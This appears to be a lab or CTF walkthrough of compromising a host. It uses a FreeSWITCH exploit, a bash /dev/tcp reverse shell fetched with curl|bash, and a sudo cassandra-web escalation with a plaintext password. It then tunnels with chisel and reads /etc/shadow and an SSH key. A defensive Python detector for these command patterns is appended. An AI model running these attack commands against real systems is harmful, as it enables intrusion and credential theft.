Copy the exploit into the working directory with searchsploit:
searchsploit -m windows/remote/47799.txt
Rename it to a Python script and run it against the target:
mv 47799.txt freeswitch.py
python3 freeswitch.py 192.168.221.240 'whoami'
Contents of shell.sh:
#!/bin/bash
bash -i >& /dev/tcp/192.168.45.236/80 0>&1
Start a Python HTTP server to host the script:
python3 -m http.server 8021
Now start a listener:
sudo rlwrap nc -nlvp 80
Have the target fetch and run the script through the exploit to get a shell:
python3 freeswitch.py 192.168.221.240 'curl http://192.168.45.236:8021/shell.sh|bash'
cassie : SecondBiteTheApple330
sudo /usr/local/bin/cassandra-web -u cassie -p SecondBiteTheApple330 -B 0.0.0.0:4444
cassandra-web is now running as root on port 4444.
Next, forward that port with chisel. Download chisel onto the target:
wget http://192.168.45.228:8021/chisel
Run the chisel server on Kali:
chisel server --reverse --socks5 -p 80
On target:
./chisel client 192.168.45.228:80 R:4444:127.0.0.1:4444
python3 cassandra.py -p 4444 127.0.0.1 /etc/shadow
Now we can try getting anthony's SSH key:
python3 cassandra.py -p 4444 127.0.0.1 /home/anthony/.ssh/id_rsa
python3 cassandra.py -p 4444 127.0.0.1 /home/anthony/.bash_history
ssh root@192.168.236.240 -i id_rsa
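Seen from the target host, the steps above leave distinctive command lines behind. The following is an added example, not part of the original notes: a small detector that flags those command shapes in process-execution records. The log format, timestamps, user names and rule names are assumptions constructed for illustration; the commands are the ones used above.

```python
import re

# Rules keyed to command shapes that appear in this walkthrough (target-side view).
RULES = {
    "download_piped_to_shell": re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|da|z)?sh\b"),
    "bash_dev_tcp_redirect": re.compile(r"/dev/(tcp|udp)/\d{1,3}(\.\d{1,3}){3}/\d+"),
    "chisel_reverse_forward": re.compile(r"\bchisel\b.*\bclient\b.*\sR:\d+:"),
    "sudo_cassandra_web_all_ifaces": re.compile(
        r"\bsudo\b.*\bcassandra-web\b.*\b0\.0\.0\.0:\d+"),
}

# Assumed record layout: "<timestamp> user=<name> cmd=<full command line>"
LINE = re.compile(r"^(?P<ts>\S+) user=(?P<user>\S+) cmd=(?P<cmd>.*)$")


def classify(cmd):
    """Return the sorted names of every rule the command line matches."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmd))


def scan(lines):
    """Parse records and return (timestamp, user, rule) for each match."""
    alerts = []
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue  # skip malformed records rather than guessing fields
        for rule in classify(m["cmd"]):
            alerts.append((m["ts"], m["user"], rule))
    return alerts


# Constructed sample log: format, times and user names are made up.
SAMPLE = [
    "10:01:02 user=svc cmd=sh -c curl http://192.168.45.236:8021/shell.sh|bash",
    "10:01:03 user=svc cmd=bash -i >& /dev/tcp/192.168.45.236/80 0>&1",
    "10:05:10 user=cassie cmd=sudo /usr/local/bin/cassandra-web -u cassie -p REDACTED -B 0.0.0.0:4444",
    "10:06:30 user=cassie cmd=./chisel client 192.168.45.228:80 R:4444:127.0.0.1:4444",
    "10:07:00 user=cassie cmd=curl -s http://127.0.0.1:4444/",  # no rule fires
    "10:07:05 user=root cmd=sudo systemctl restart ssh",         # no rule fires
]

if __name__ == "__main__":
    for ts, user, rule in scan(SAMPLE):
        print(ts, user, rule)
```

The file reads made with cassandra.py and the final ssh login run from the Kali side, so they do not show up in these records; those would have to be caught in the cassandra-web and sshd logs on the target.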